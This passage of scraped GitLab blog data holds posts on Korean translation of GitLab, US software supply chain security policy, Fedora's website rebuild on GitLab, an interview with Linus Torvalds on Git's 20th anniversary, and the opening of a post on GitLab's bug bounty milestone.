to ensure uniform translations. We collaborated to achieve consistency in the wording, and we synced regularly to discuss and resolve any ambiguous or contentious issues.\n\n**What was the most challenging aspect of the project?**\n\nOne of the biggest challenges we faced was the continuous addition of new strings and phrases with each new GitLab update. Keeping up with these additions proved to be quite challenging. 
Additionally, there were instances where there was no direct Korean equivalent for English terms, or where additional contextual explanations were required, making the translation process more complex.\n\nWhen students identified inconsistencies that were not covered by the glossary, I encouraged them to bring these up in the regular sync. We tried to determine which translated terms were commonly used. And we used the [Korean TTA standards (Telecommunications Technology Association) dictionary](https://terms.tta.or.kr/main.do) as a primary point of reference.\n\n**Could you provide some closing thoughts regarding the contribution?**\n\nThe students were surprised to discover their ability to actively participate in the open source software they rely on, leading to a newfound sense of pride. This transformation signified a shift in the focus to embracing the concept of community and recognizing the genuine value of open source software through their contributions to shared community-driven objectives.\n\n### Learn how you can contribute to translation\nContributing to translation is a journey that goes beyond words; it's about building a global community and making technology more accessible. As Professor Lee mentioned, students discovered they could actively engage in open source software, and this filled them with pride. It's a rewarding journey that goes beyond language, and it's an opportunity to make a meaningful impact on the tech world.\n\nSoftware can only be as usable and accessible to its users as it is understandable by them. Translation helps bridge the linguistic and cultural gaps that might be preventing your software from being adopted by a given community. Together with contributors, proofreaders also play an important role in helping new contributors succeed by ensuring the consistency and quality of translations. 
Did you know that the term \"merge request\" can be translated into Korean in various ways?\n\nA good place to start is the [Translate GitLab page](https://docs.gitlab.com/ee/development/i18n/), where you can learn how you can contribute to GitLab's externalization, translation, proofreading, and merging. If you have any questions, please join translate.gitlab.com or post questions on the [Crowdin discussions forum](https://translate.gitlab.com/project/gitlab-ee/discussions).\n\nTo participate in discussions building a glossary list for Korean translation, join us at [gitlab.com/korean-translation/gitlab](https://gitlab.com/korean-translation/gitlab)! Once we finalize the glossary list and establish grammar rules, we aim to consistently elevate the quality of our translations.\n",[9,267,1099],"features",{"slug":1101,"featured":6,"template":689},"behind-the-scenes-of-gitlab-korean-translation","content:en-us:blog:behind-the-scenes-of-gitlab-korean-translation.yml","Behind The Scenes Of Gitlab Korean Translation","en-us/blog/behind-the-scenes-of-gitlab-korean-translation.yml","en-us/blog/behind-the-scenes-of-gitlab-korean-translation",{"_path":1107,"_dir":244,"_draft":6,"_partial":6,"_locale":7,"seo":1108,"content":1114,"config":1121,"_id":1123,"_type":14,"title":1124,"_source":16,"_file":1125,"_stem":1126,"_extension":19},"/en-us/blog/biden-administration-celebrates-1-year-anniversary-of-eo-by-accelerating-software-supply-chain-security",{"title":1109,"description":1110,"ogTitle":1109,"ogDescription":1110,"noIndex":6,"ogImage":1111,"ogUrl":1112,"ogSiteName":673,"ogType":674,"canonicalUrls":1112,"schema":1113},"Biden administration updates software supply chain security requirements","GitLab's One DevOps Platform can help agencies comply with government 
requirements.","https://res.cloudinary.com/about-gitlab-com/image/upload/v1749667852/Blog/Hero%20Images/eosecurity.jpg","https://about.gitlab.com/blog/biden-administration-celebrates-1-year-anniversary-of-eo-by-accelerating-software-supply-chain-security","\n                        {\n        \"@context\": \"https://schema.org\",\n        \"@type\": \"Article\",\n        \"headline\": \"Biden administration accelerates software supply chain security expectations a year into Executive Order\",\n        \"author\": [{\"@type\":\"Person\",\"name\":\"Sandra Gittlen\"}],\n        \"datePublished\": \"2022-05-12\",\n      }",{"title":1115,"description":1110,"authors":1116,"heroImage":1111,"date":1117,"body":1118,"category":1119,"tags":1120},"Biden administration accelerates software supply chain security expectations a year into Executive Order",[862],"2022-05-12","\n\nPresident Joe Biden last year on May 12th signed [Executive Order 14028 \"Improving the Nation’s Cybersecurity\"](https://www.whitehouse.gov/briefing-room/presidential-actions/2021/05/12/executive-order-on-improving-the-nations-cybersecurity/), which called on public and private sector organizations to improve the nation’s cybersecurity with “bold change” and “significant investments”. “Incremental improvements will not give us the security we need,” the EO states. Since then, the administration has only increased the pressure on agencies, forcing them to take a hard look at their software supply chains and justify their application development decisions, including how they use open source code, test their code, and grant permissions.\n\n“The federal government has accelerated its expectations for software supply chain security compliance, yet some organizations are still trying to understand how to broadly and proactively protect their software development,” says [Joel Krooswyk](https://gitlab.com/jkrooswyk), Senior Manager of Solutions Architecture at GitLab. 
“Agencies and their vendors have been focused on policy management and role-based access, but the federal government wants to go deeper and know where code is coming from and how to better secure it. They are quickly moving down the supply chain.” \n\nThe interest in the origins of software code stems from the complexity of cyberattacks such as that [carried out on SolarWinds](/blog/what-the-solarwinds-attack-can-teach-us-about-devsecops/), as well as the ongoing [log4j](/blog/use-gitlab-to-detect-vulnerabilities/) and Spring4Shell vulnerabilities. “Intentionally malicious contributions can inject code that is literally opening the doors to hackers,” Krooswyk says. “However, agencies and vendors can’t just stop utilizing open source software and microservices. They need the ingenuity of the open source community.” GitLab is a proponent of open source and believes [everyone can contribute](/company/mission/).\n\nThe Biden administration, through its frameworks and mandates, is simply saying, 'we have to keep a better eye on that,' especially as more organizations assume a cloud-first posture, according to Krooswyk.\n\nFor example, earlier this year, the National Institute of Standards and Technology (NIST) published the Software Security Development Framework (SSDF) 1.1, which offers guidance on how to [create tighter controls throughout the software development lifecycle](/blog/comply-with-nist-secure-supply-chain-framework-with-gitlab/).\n\nThe SSDF 1.1 framework recommends: \n- organizations should be prepared by reviewing permissions\n- all components of software should be safe from tampering and unauthorized access\n- software should be produced with minimal security vulnerabilities in its releases\n- organizations should be able to quickly and sufficiently respond to vulnerabilities \n\n## Code sourcing\n\nThe next phase in the federal government’s move to secure the software supply chain will be to [require reporting and/or 
attestation](/blog/securing-the-software-supply-chain-through-automated-attestation/).\n\n“Agencies and their vendors are being asked if their software is justifiably built using properly sourced code. As a result, organizations may have to explain why they chose to use code from non-mainline repositories,” Krooswyk says.\n\nFor instance, if a DevOps team chooses code from a non-mainline repository originating in China, they will have to attest to why they did that over sourcing from a mainline repository. The same idea applies to pulling clean containers and not repeatedly using those plagued with existing vulnerabilities, according to Krooswyk.\n\nHe believes these questions will all be rolled up into a Cybersecurity & Infrastructure Security Agency (CISA) mandate for a [software bill of materials](https://www.cisa.gov/sbom) (SBOM), which is a list of ingredients that make up software components. “The SBOM will show the list of contributors, known vulnerabilities, results of dependency scans on open source, and more,” he says. “The Biden administration, NIST, and CISA are all in alignment on the need for more consistent software security attestation.”\n\n## How to prepare\n\nWhile some agencies, like the U.S. Department of Defense, might be on the cutting edge of these mandates, smaller agencies or those with more legacy infrastructure and practices might require more effort to be able to comply. “If your development, operations, and security processes aren’t transparent or fully documented and if your scanning is still manual, then these new requirements could be a roadblock,” Krooswyk says. 
“The administration is only going broader in terms of the scope of mandates and more specific with security requirements as time progresses to plug all the security holes, meaning more regulations and further compliance.”\n\nGitLab believes some of the long-term asks expected to come from the government may include:\n- bake security in, don’t bolt it on\n- ensure scanning is top of mind\n- maintain zero-trust permission models and source code management controls\n- any open source software used should have known origins and support SBOM generation, verifiable by dependency scanning\n- purchase secure commercial off-the-shelf software that complies with all security and labeling requirements from standards bodies\n\nGitLab’s One DevOps Platform can help organizations answer this request for software supply chain security compliance through visibility and transparency into processes, verifiable compliance, zero-trust user management, and templated security automation. “While we are helping organizations with cloud adoption and infrastructure modernization, we’re doing so in such a way as to not compromise on risk or security, providing end-to-end traceability and step-by-step auditability from issue creation through deployment,” he says.\n\nGitLab has a distinct set of features that make enabling NIST frameworks and attesting to code sourcing decisions easier:\n- [SBOM creation](https://docs.gitlab.com/ee/user/application_security/dependency_list/#dependency-list) in a standardized format \n- [Security dashboards](https://docs.gitlab.com/ee/user/application_security/security_dashboard/)\n- [Vulnerability reports and remediation](https://docs.gitlab.com/ee/user/application_security/vulnerability_report/)\n- [Pipeline frameworks and compliance](https://docs.gitlab.com/ee/user/project/settings/#compliance-frameworks)\n- [Security scanning breadth of offering](https://docs.gitlab.com/ee/user/application_security/) from SAST and DAST to fuzz testing \n\nAs the EO states, 
incremental improvements are not enough to properly secure software. To meet the totality, speed, and sophistication of the administration’s demands for cybersecurity protections, consider adopting GitLab’s One DevOps Platform.\n\n","devsecops",[685,865,9],{"slug":1122,"featured":6,"template":689},"biden-administration-celebrates-1-year-anniversary-of-eo-by-accelerating-software-supply-chain-security","content:en-us:blog:biden-administration-celebrates-1-year-anniversary-of-eo-by-accelerating-software-supply-chain-security.yml","Biden Administration Celebrates 1 Year Anniversary Of Eo By Accelerating Software Supply Chain Security","en-us/blog/biden-administration-celebrates-1-year-anniversary-of-eo-by-accelerating-software-supply-chain-security.yml","en-us/blog/biden-administration-celebrates-1-year-anniversary-of-eo-by-accelerating-software-supply-chain-security",{"_path":1128,"_dir":244,"_draft":6,"_partial":6,"_locale":7,"seo":1129,"content":1135,"config":1142,"_id":1144,"_type":14,"title":1145,"_source":16,"_file":1146,"_stem":1147,"_extension":19},"/en-us/blog/building-new-fedora-project-website-with-gitlab",{"title":1130,"description":1131,"ogTitle":1130,"ogDescription":1131,"noIndex":6,"ogImage":1132,"ogUrl":1133,"ogSiteName":673,"ogType":674,"canonicalUrls":1133,"schema":1134},"How GitLab helped Fedora build websites and community","Learn how the Fedora Project recently modernized its web development practices and streamlined team workflows with GitLab.","https://res.cloudinary.com/about-gitlab-com/image/upload/v1749682851/Blog/Hero%20Images/communityhands.jpg","https://about.gitlab.com/blog/building-new-fedora-project-website-with-gitlab","\n                        {\n        \"@context\": \"https://schema.org\",\n        \"@type\": \"Article\",\n        \"headline\": \"How building modern websites with GitLab led to a healthier Fedora Project community\",\n        \"author\": [{\"@type\":\"Person\",\"name\":\"Akashdeep Dhar\"}],\n        
\"datePublished\": \"2023-07-11\"\n      }",{"title":1136,"description":1131,"authors":1137,"heroImage":1132,"date":1139,"body":1140,"category":10,"tags":1141},"How building modern websites with GitLab led to a healthier Fedora Project community",[1138],"Akashdeep Dhar","2023-07-11","\nWhen [Fedora Linux 38](https://fedoraproject.org/) debuted in April 2023, the Fedora Project community and I had an extra reason to celebrate. The first item in the community's [official release announcement](https://fedoramagazine.org/announcing-fedora-38/) was one we were extremely proud of: our brand-new Fedora Project websites.\n\nThe launch of the new websites was the culmination of many months of good, old-fashioned community contribution from the \n[Fedora Websites and Apps team](https://gitlab.com/fedora/websites-apps) and other teams such as [Fedora Infrastructure](https://pagure.io/fedora-infrastructure), [Fedora Marketing](https://docs.fedoraproject.org/en-US/marketing/), \n[Fedora Design](https://fedoraproject.org/wiki/Design), and many more teams. This effort didn't just involve the development of the refreshed websites; it also involved rearchitecting the team's technical stack and aligning our workflows with modern industry best practices. \n\nIn this article, I will explain how migrating our workflow to GitLab helped us to not only build refreshed websites for the Fedora Project but also reimagine and streamline our community's process for building, maintaining, testing, and deploying them. The result: new workflows that redefine our team's processes to incentivize contribution and avoid the looming threat of potential contributor burnout – not to mention the elegant websites themselves.\n\n## Why we embarked on this effort\nAbout two years ago, four Fedora Project community members ([Ramya Parimi](https://gitlab.com/ramyaparimi), [Nasir Hussain](https://gitlab.com/nasirhm), [Justin W. 
Flory](https://gitlab.com/jwflory), and [myself](https://gitlab.com/t0xic0der)) were working on a project together when we discovered that only a tiny group of volunteer contributors maintained our websites. We immediately faced a dilemma that's common in many free and open source projects: Should that tiny group disband or disappear, we were at risk of not being able to maintain our websites and applications. Also, we didn't want the volunteer contributors to get burnt out under the constant stress of maintaining these projects. We needed more hands on deck, and we needed them quickly.\n\nSo our former Fedora Community Architect (the position was then called Fedora Community Action and Impact Coordinator, or FCAIC), [Marie Nordin](https://gitlab.com/riecatnor), helped us kickstart a community initiative that inspired us to not only refresh Fedora Project websites and applications but also establish more reliable processes and workflows around them, too.\n\nThat second part is incredibly important. We focused on enhancing the visual appeal and user experience of our websites — diligently adhering to the best accessibility practices, implementing a native dark mode that aligns with the user's system theme, and effectively advocating for our offerings to the best of our abilities (among other things). But we needed to solve the problem of maintainability, too. That would involve addressing some underlying issues that, although they looked deceptively simple on the surface, profoundly influenced the long-term sustainability of the team's work. Our goal was to ensure that even when *we* were not around, contributors who would do this work *after* us would be able to set things up and maintain them in the long run without issue.\n\nTo recruit more contributors, we needed to align the way our team worked with current industry practices. 
Adopting GitLab helped us do that.\n\n## How GitLab helped simplify, unify, and standardize\nHistorically, the website development team employed a range of tools as part of our workflows. Some we developed internally; others we acquired externally and integrated into our infrastructure. But these tools weren't always compatible with one another, meaning extra effort on our part (establishing a standardized business language for effective communication of work plans, progress obstacles, task updates, etc.). That not only impacted our operational efficiency but also drained our resources (for example, we were dedicating meetings solely to the purpose of ensuring everyone was aligned and understood the processes).\n\nAdopting GitLab helped alleviate that burden, because it's [a single, comprehensive platform](https://about.gitlab.com/stages-devops-lifecycle/). Our team got acclimated to capabilities like creating and tagging issues and epics to organize work, building Kanban boards and Gantt charts to map work-in-progress and construct functional timelines, and incorporating merge requests as progress indicators in a comprehensive project overview. We then understood how the cohesive nature of GitLab's approach to most aspects (if not all) of the software development lifecycle significantly enhanced our distributed team's overall efficiency.\n\nBut we use GitLab for more than just planning and implementation. We completely rewrote the technology stack using industry-standard static site-generating libraries like [NuxtJS](https://v2.nuxt.com/). GitLab's ability to create and deploy static sites helps us automate our deployment workflow. Then we coupled the revamped frontend with the [NetlifyCMS](https://v1.netlifycms.org/) content management system that relies on GitLab as its core. We also simplified the translation pipeline for localizing and internationalizing our website content. 
By employing continuous integration tools, we were able to generate dynamic test deployments to evaluate our websites before deploying them to the production environment. That success also prompted us to utilize GitLab for storing meeting logs and documentation, streamlining our project management processes even further.\n\nHere's an example.\n\nIn the past, when our websites were based on [Frozen Flask](https://pypi.org/project/Frozen-Flask/), we used various shell scripts to maintain it. These scripts would create an [OCI](https://opencontainers.org/) container using [Podman](https://podman.io/), build static files, perform translations, and serve the website. You can still find the [deprecated](https://pagure.io/fedora-websites) [repositories](https://pagure.io/fedora-web/websites/) where this was the standard development, testing, and deployment method. Although this process was automated using Ansible in our community infrastructure, it seemed complex for less experienced contributors.\n\nAfter transitioning to GitLab, we could deploy to our fast-changing staging environments directly from [GitLab Pages](https://docs.gitlab.com/ee/user/project/pages/) while the slow-changing production environment remained on the community infrastructure. We also utilized GitLab's CI/CD features to test merge requests with ephemeral deployment environments. Since the automation is integrated into the project itself, any push to the primary branch or merge request triggers a deployment workflow. This consolidation of automation into a single unit has further streamlined our processes.\n\n## Better workflow, healthier community\nChanges like these were critical to the Fedora Project's overall [mission to foster an inviting environment](https://docs.fedoraproject.org/en-US/project/#_our_community) for contributors. 
Our new GitLab-centric workflow improved the experience for team members who wanted to contribute to documenting and translating content without having to navigate the technical intricacies of using Git. By lowering the entry barrier, we aimed to attract prospective newcomers and promote a more inclusive team dynamic.\n\nAs a result, we saw content contributions from other teams. And then, gradually, more folks joined us in our revamp efforts, helping to [make this community initiative a success](https://communityblog.fedoraproject.org/tag/websites-and-apps-initiative-wrapup/).\n\n*The [GitLab Open Source Partners](https://go.gitlab.com/030Ue3) are building the future of open source on GitLab. Connect with them on [Gitlab.com](https://gitlab.com/gitlab-com/marketing/community-relations/open-source-program/gitlab-open-source-partners).*\n\nPhoto by [Hannah Busing](https://unsplash.com/@hannahbusing?utm_source=unsplash&utm_medium=referral&utm_content=creditCopyText) on Unsplash.\n{: .note}\n\n\n",[9,267,1099],{"slug":1143,"featured":6,"template":689},"building-new-fedora-project-website-with-gitlab","content:en-us:blog:building-new-fedora-project-website-with-gitlab.yml","Building New Fedora Project Website With Gitlab","en-us/blog/building-new-fedora-project-website-with-gitlab.yml","en-us/blog/building-new-fedora-project-website-with-gitlab",{"_path":1149,"_dir":244,"_draft":6,"_partial":6,"_locale":7,"seo":1150,"content":1156,"config":1161,"_id":1163,"_type":14,"title":1164,"_source":16,"_file":1165,"_stem":1166,"_extension":19},"/en-us/blog/celebrating-gits-20th-anniversary-with-creator-linus-torvalds",{"title":1151,"description":1152,"ogTitle":1151,"ogDescription":1152,"noIndex":6,"ogImage":1153,"ogUrl":1154,"ogSiteName":673,"ogType":674,"canonicalUrls":1154,"schema":1155},"Celebrating Git's 20th anniversary with creator Linus Torvalds","Discover the origins of the open-source version control system, why he handed over the reins a few months in, and what he 
thinks about adding new programming languages to Git.","https://res.cloudinary.com/about-gitlab-com/image/upload/v1749662510/Blog/Hero%20Images/git-20-years-opt1.png","https://about.gitlab.com/blog/celebrating-gits-20th-anniversary-with-creator-linus-torvalds","\n                        {\n        \"@context\": \"https://schema.org\",\n        \"@type\": \"Article\",\n        \"headline\": \"Celebrating Git's 20th anniversary with creator Linus Torvalds\",\n        \"author\": [{\"@type\":\"Person\",\"name\":\"Patrick Steinhardt\"}],\n        \"datePublished\": \"2025-04-07\"\n      }",{"title":1151,"description":1152,"authors":1157,"heroImage":1153,"date":1158,"body":1159,"category":10,"tags":1160},[747],"2025-04-07","The Git version control system was first released on April 7, 2005, by the father of the Linux kernel, Linus Torvalds. To mark the 20th anniversary of this important project that is nowadays used by almost every single developer, I interviewed Linus about the history of Git, why he handed over maintainership of Git, and what he considers to be its most important milestones.\n\n**In 2005, you were already the maintainer of the thriving Linux kernel. 
Why did you decide to start a new version control system?**\n\nSo, I got into it from really despising version control.\n\nI had used the traditional version control systems (CVS/RCS/SCCS) both as an end user (i.e., tracking open source projects like [GCC](https://gcc.gnu.org/)) and as a developer (we used CVS at Transmeta for everything) and absolutely hated the experience with a passion.\n\n\u003Cimg src=\"https://about.gitlab.com/images/blogimages/linustorvalds.png\" align=\"left\" width=\"200px\" style=\"padding-right: 20px; padding-bottom: 10px\"/>\n\nAnd yes, back then most projects that used CVS had probably moved to [SVN](https://subversion.apache.org/), but honestly, I always felt that SVN was just \"lipstick on a pig.\" It was just CVS in another form, with some UI improvements, but none of the fundamentals fixed, and a few new problems added.\n\nThe problems with CVS and its ilk are too many to even list, and, happily, they have largely become irrelevant and younger developers have probably never even had to deal with any of it. I absolutely refused to deal with it for the kernel, even though a few subsystems (notably the networking side) were actually using CVS to track their code back in the '90s.\n\nAnyway, back then I lived in the Bay Area, and Larry McVoy, who I knew from other projects (mainly [lmbench](https://www.usenix.org/legacy/publications/library/proceedings/sd96/full_papers/mcvoy.pdf)), had started BitMover, which had a new version control model called BitKeeper, or BK, for short.\n\nBK wasn't open source, but Larry liked open source projects and really felt that the lack of version control was holding the kernel back. He wasn't wrong, but the traditional source code managers (SCMs) really didn't work for me at all. 
Larry spent some time showing me and David Miller (networking maintainer and existing CVS user) what BitKeeper could do.\n\nBK wasn't perfect, and it was based on Source Code Control System (SCCS) like so many other traditional SCMs were, and thus had the same broken \"history per file\" model that everybody else had, and that causes huge and fundamental issues with file renaming and deletion.\n\nBut BK also wasn't just that \"lipstick\" thing. It may have used SCCS at a low level, but on a higher level it fixed some really fundamental things, and did proper distributed development, and had a real global – not per-file – history that made merging code from different trees actually work.\n\nWith CVS, creating branches and merging them was something you had to plan and discuss with people, and were major events. With BK, every repository was a branch. We take that for granted now, and Git obviously took it much further by having many branches *per* repository, but even the much more limited BK model was really a big deal at the time.\n\nAgain, BK wasn't perfect. As mentioned, it did do per-file history, which really is a big fundamental problem that makes renaming and file merging simply not work reliably, and inevitably causes chaos and pain (for CVS people, think Attic, shudder). And it had some scalability issues, too, but those took a while to become more than a bit problematic.\n\nBut the biggest problem with BK was the licensing, and while over the years (we used BK from 2002 to 2005) a lot of kernel maintainers did end up switching over to it, it was always a bit of a friction point. And that friction came to a head in late 2004, and the use of BK for the kernel basically became untenable a few months later.\n\nI was in the situation that for three years I'd finally used source control that worked, and it really had solved a lot of problems. 
There was no way I was going back to the days before source control, but in the years we'd been using BK, nothing better had really come out of the open source community.\n\nSure, people knew that CVS and SVN didn't work well, and there were projects that tried alternate approaches, but some of those approaches were even worse (basically amounting to \"fancy patch tracking\"), or had some good ideas but in the process making up some entirely new horrible design mistakes ([Monotone](https://www.monotone.ca/)).\n\nSo, I looked around for a while, and decided that I didn't have any options – I had to write my own.\n\nNow, technically, it actually did take only a few days to make the first version of Git, and hey, it's all there in the Git commit history. It's easy enough to see how it goes from pretty much zero to being usable enough that I started applying patches from others a week later (and being actively used for the kernel a few days after that).\n\nBut that ignores the fact that I had been *thinking* about the problem for a while by then. Writing code is easy. Getting a good design is what matters. So there was a fair amount of background to those few days that is pretty important, and that part doesn't show up in the history.\n\nAnd hey, that first version was very, very rough, and didn't do a lot that was to come later. But you can definitely already see much of the core design in those first few days.\n\n**Can you give us a short recount of the first days and weeks of how the Git project was started?**\n\nI had basically decided that I will stop kernel development until I had an alternative that worked for me. The main goals were to be distributed and high performance, and be something you could absolutely rely on to catch any corruption.\n\nBut I really do want to stress that I wasn't interested in SCMs, per se. I was interested in the end result, not in the process. 
So Git was never like the kernel for me: I do Linux because I think kernels are interesting - I did Git because I had to.\n\nWhich then directly segues into your next question.\n\n**You handed over the maintainership of Git to Junio Hamano after a couple of months, and Junio is still the maintainer. Why did you hand over maintainership and what made you pick Junio?**\n\nHanding over maintainership was not a hard choice. It was very much: \"The moment somebody else comes along that I can trust to keep it going, I'll go back to doing just the kernel.\"\n\nWhich is not to say that I just threw things over the wall and prayed for the best. I ended up maintaining Git for something like four months because I felt I needed to find somebody who would stick around, and had that hard-to-explain quality of \"GoodTaste\"(TM).\n\nJunio had been one of the very early people involved (he literally showed up the first week of development), but it's not like I just said, \"Tag, you're it.\"  It takes a while to see who sticks around, and who writes code and makes decisions that make sense.\n\nAnd I think Junio has been exemplary. I get much too much credit for the few months I spent on Git - particularly in light of the 20th anniversary. I'll take credit for getting the core design right, and getting the project started, but it really is Junio who has led the project (not to belittle the hundreds of other people involved, but still).\n\n**The initial version of the Mercurial version control system was released only 12 days after the initial version of Git, on April 19, 2005. Many people claim that Mercurial's user experience was superior to Git's, but nowadays Git is significantly more popular. Why do you think that Git has won over Mercurial?**\n\nOh, a big part of it is obviously just network effects, and SCMs have very strong network effects. 
It's why CVS survived as long as it did despite its limitations.\n\nSo, the fact that the kernel used Git (and then at some point it got to be very popular in the Ruby on Rails community, and then it took off everywhere).\n\nBut I really do think that the design of Git is superior. The core model is both very simple and very powerful, and I think that made it easier to translate into other environments. JGit was an early example of that, but you obviously have implementations like the MSgit virtual filesystem, etc.\n\nAnd while Git was famously somewhat hard to use early on, I really do think that some of that comes from having done things \"right,\" where people coming from other environments found Git non-intuitive because Git really did a few hard decisions that a traditional SCM person would never have done.\n\n**The Git project has not stood still since you handed maintainership over to Junio, and its community is always busy working on new features. What do you think the most important milestones were after you left the project?**\n\nThat's really hard for me to say, mainly because I obviously made Git work for me, and so the things *I* use have worked from pretty much Day One. Just as an obvious example: Making Git work on Windows was obviously a huge step for other people, but it affected *me* not at all ;)\n\nThere's obviously all the infrastructure within Git itself to make it a lot easier to use, but I think most of the big milestones have all been around people taking the Git infrastructure and building things around it. Those often end up feeding back into Git features, of course, but, at the same time, the milestone is about something external.\n\nTo give an obvious example: All the big Git hosting sites were big milestones. 
Making Git be distributed was what made those so much easier to do, but the *milestone* was how then the hosting made it so easy for users to use Git for various projects.\n\n**If you had the capacity to work on Git full time again, would there be anything that you would like to implement?**\n\nAbsolutely not. Git did everything I really needed from very early on – my use is actually fairly limited, and I only really care about one project.\n\nAnd I say \"absolutely not\" because I refer you to that earlier answer: I was never really interested in SCMs at all to begin with. I think a large reason for why Git ended up being so different - mostly in good ways - from other SCMs was that I approached it more like I would a distributed journaling filesystem, not really a traditional SCM.\n\n**Is there any feature or design decision in Git that you have come to regret in retrospect?**\n\nDesign decisions? No. I still think the high-level design is just very good, and you can discuss various Git concepts without ever getting into the nitty-gritty complexity of actual implementation.\n\nAnd I think that's important in a project. You need a certain high-level design principle to guide the conceptual direction of a project.\n\nSometimes people take that too far, and think that the high-level design means that the implementation must then slavishly follow some core principle. And that's wrong, too – the *implementation* will have lots of nasty corner cases because reality is hard and people want odd things, but there needs to be some kind of top-level design that you can point to and reason about at a high level before you get your hands dirty with the nasty reality.\n\nAnd I think Git has a good balance of that. A very straightforward object store design (call them \"structured Merkle trees\" if you are a CS person, or you might just think of them as a \"content addressable storage\" if you are a filesystem person). 
That core design is there – but at the same time, it's realistically just a very tiny part of the actual code. Most of the *code* is about all the things you can do with the core design, but that basic clarity of design still gives the project some kind of high-level structure.\n\nIt's the same kind of high-level structure that Unix itself had, whether you said \"everything is a file\" or you were talking about process handling. There are a few \"concepts\" that drive the design, but then 99% of the code is about the ugly harsh details of what you build on top of that to make it all useful in the real world.\n\nI have two mantras in technology: \"If I have seen further, it is by standing on the shoulders of giants\" (Newton) and \"Genius is 1% inspiration and 99% perspiration\" (Edison).\n\nBut talking about the 99% perspiration: While I am very happy with the big design, there are certainly various details that I would have done differently if I were to do Git today.\n\nBut honestly, they aren't that important. What's much more important is all the *good* details that have been done over the last two decades.\n\n**The Linux kernel has started to use Rust as a programming language for some of its subsystems. Do you think it makes sense to start using such newer programming languages like this in Git?**\n\nI suspect that when it comes to Git, there's less reason to try to mix languages, which is always somewhat painful.\n\nIn the kernel, the end result is one single kernel binary – even if much of it can be loaded dynamically as modules, it is still linked together into effectively one single binary.\n\nAnd that makes using multiple languages more complex. 
But, on the other hand, the kernel also has more reason to worry about memory safety and, thus, look at newer languages.\n\nIn Git, if somebody wants to write parts of it in Rust or another language, I suspect it makes much more sense to just go for a separate implementation rather than try to mix languages in one binary.\n\nMuch of the Git core ideas are simple enough that just having parallel implementations of the core likely isn't too painful, and then you can target particular problem spaces where a different language makes more sense.\n\nAnd we've seen that in Git already, of course: That's exactly what JGit is. The use of a different language was due to a different web-based environment where that language choice was much more natural.\n\nI know that there are already Rust implementations of some of the core Git functionality, and I think the situation is similar: I suspect they make more sense in specific situations than in some kind of overall \"let's convert things to Rust\" kind of way.\n\nSo for anybody who is interested in implementing things in Rust, I'd suggest looking for target areas where the advantages of Rust are more obvious. I don't think C has actually been all that problematic in the standard Git source base.\n\n**New version control systems are popping up every couple of years. Do you think that Git will stay relevant in the future?**\n\nI already mentioned the network effects in SCMs, and I think that means that to replace Git you have to be not just slightly better, you have to be enormously better. Or so compatible that you effectively are just a new implementation of Git.\n\nAnd I do think the SCM situation has changed – Git doesn't have the kinds of huge gaping fundamental problems that SCMs had before Git. 
So being \"enormously better\" is fairly hard.\n\nSo, yes, I would expect Git to stay relevant for the foreseeable future, with people working on improvements *around* Git rather than replacements.\n\n*Note: This interview has been edited for length and clarity.*\n\n> Take a [journey with us through Git's 20-year history](https://about.gitlab.com/blog/journey-through-gits-20-year-history/).\n\n## Learn more about Git\n\n- [What's new in Git 2.49.0?](https://about.gitlab.com/blog/whats-new-in-git-2-49-0/)  \n- [What’s new in Git 2.48.0?](https://about.gitlab.com/blog/whats-new-in-git-2-48-0/)  \n- [A beginner's guide to the Git reftable format](https://about.gitlab.com/blog/a-beginners-guide-to-the-git-reftable-format/)\n- [Git project](https://git-scm.com/)",[9,751],{"slug":1162,"featured":91,"template":689},"celebrating-gits-20th-anniversary-with-creator-linus-torvalds","content:en-us:blog:celebrating-gits-20th-anniversary-with-creator-linus-torvalds.yml","Celebrating Gits 20th Anniversary With Creator Linus Torvalds","en-us/blog/celebrating-gits-20th-anniversary-with-creator-linus-torvalds.yml","en-us/blog/celebrating-gits-20th-anniversary-with-creator-linus-torvalds",{"_path":1168,"_dir":244,"_draft":6,"_partial":6,"_locale":7,"seo":1169,"content":1175,"config":1181,"_id":1183,"_type":14,"title":1184,"_source":16,"_file":1185,"_stem":1186,"_extension":19},"/en-us/blog/celebrating-one-million-bug-bounties-paid",{"title":1170,"description":1171,"ogTitle":1170,"ogDescription":1171,"noIndex":6,"ogImage":1172,"ogUrl":1173,"ogSiteName":673,"ogType":674,"canonicalUrls":1173,"schema":1174},"Celebrating a million dollars in bounties paid","Our bug bounty program has grown, expanded and matured in the past 5 years. 
A lot can happen in a million dollars’ time.","https://res.cloudinary.com/about-gitlab-com/image/upload/v1749680992/Blog/Hero%20Images/silhouette-of-crowd-people-1486628.jpg","https://about.gitlab.com/blog/celebrating-one-million-bug-bounties-paid","\n                        {\n        \"@context\": \"https://schema.org\",\n        \"@type\": \"Article\",\n        \"headline\": \"Celebrating a million dollars in bounties paid\",\n        \"author\": [{\"@type\":\"Person\",\"name\":\"Heather Simpson\"}],\n        \"datePublished\": \"2020-01-14\",\n      }",{"title":1170,"description":1171,"authors":1176,"heroImage":1172,"date":1178,"body":1179,"category":865,"tags":1180},[1177],"Heather Simpson","2020-01-14","\n\nWhat started as a small, public vulnerability disclosure program awarding swag on qualified reports has grown into a thriving public bug bounty program that’s just paid out its millionth dollar in bounties and has seen contributions from hundreds of security researchers.   \n\nBut it's about much more than a million dollars in bounty payments. Our journey to this point has been an iterative one, gaining strength and improving along the way as we grow, learn and receive feedback from the security research community. We believe our journey models our commitment to building a strong and secure product for our customers but also our dedication to the open source and security community; one where everyone can contribute and also reap the rewards.  \n\n### Swags to riches  \n\nKnowing we needed to walk before we could run, the swag-awarding public vulnerability disclosure program we’d opened in 2014 quickly moved to a private, paid bounty program including a small pool of researchers, many of whom gained access through the previous vulnerability disclosure program. 
As we grew our security and appsec team and seasoned our processes around how we prioritize reports and how we collaborate internally to define and implement fixes, we quickly understood we’d want an open, public program where an entire community of security researchers could contribute. With the help of HackerOne, we built and [launched our public bug bounty program in December 2018](/blog/gitlab-hackerone-bug-bounty-program-is-public-today/). We’re excited to have just celebrated our one year anniversary as a public program in December 2019.  \n\n### So, what does a million dollars in bug bounties look like?  \n\n• Our appsec team has worked with 768 different researchers since our PVD launched in 2014, including several of HackerOne’s all-time leading reporters. \n\n• We’ve resolved 479 reports and made 400 of those reports public.  \n\n• 227 security researchers submitted multiple reports, meaning their first engagement with us was a positive one.    \n  \n[Transparency is key to security](/handbook/security/#security-vision) at GitLab. Transparency is also one of our core values and it's very important to our bug bounty program. You can see from our [disclosure policy](https://hackerone.com/gitlab) that resolved reports are made public via issues on GitLab.com 30 days after releasing a fix. There are certain reports, however, that we cannot disclose due to sensitive information, either at the request of the reporter or to protect a customer. 